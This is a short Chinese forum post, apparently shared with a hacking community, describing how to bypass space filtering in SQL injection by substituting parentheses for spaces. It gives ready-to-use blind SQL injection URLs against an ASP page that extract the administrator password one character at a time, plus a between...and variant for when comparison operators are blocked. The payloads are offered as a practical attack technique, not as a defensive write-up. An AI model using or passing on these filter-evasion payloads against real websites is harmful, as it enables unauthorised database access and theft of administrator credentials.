關於空格,有許多替換方式,比如TAB空格,SQL數據庫中的/**/,但我又找到了另一種替換方式,已發表於《黑客手冊》2006.7期中,這裡挑其精華,現一下吧!
對於SQL語句,大家還都習慣於其的空格,比如select id from [name],如果中間沒有了空格,那就成了selectidfrom[name], 一灘糊塗!除了上面所說到幾個空格的替代方法外,我發現用()括號在SQL中一樣可以運行,比如上面的語句,就可以寫成,select(id)from[name],有括號分隔,可以正常執行。
舉個例 子說一下,我們得到一個注入點:jmdcw.asp?name=aa'and 1=1 and ''=',如果替換其中的1=1為查詢管理員的密碼的語句:(select asc(mid(pass,1,1)) from [name] where id=1)>49。如何用空格呢?其實可以寫成這樣的:
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))>49)and''='
如果屏蔽了<和>符號,則用between…and…,語句是:
jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))between(40)and(50))and''='
對於中間應該出現空格的地方,用()進行替換,不過,對於很復雜的SQL語句就不太好用了。上面說到的是字符型的,如果是數值型,可以在id=1後加一個括號,不過這個我沒有測試,比如:jmdcw.asp?id=(1)and(select.....),應該是可行的吧?
呵呵,總結一下,和LOVESHELL上的朋友分享一下。
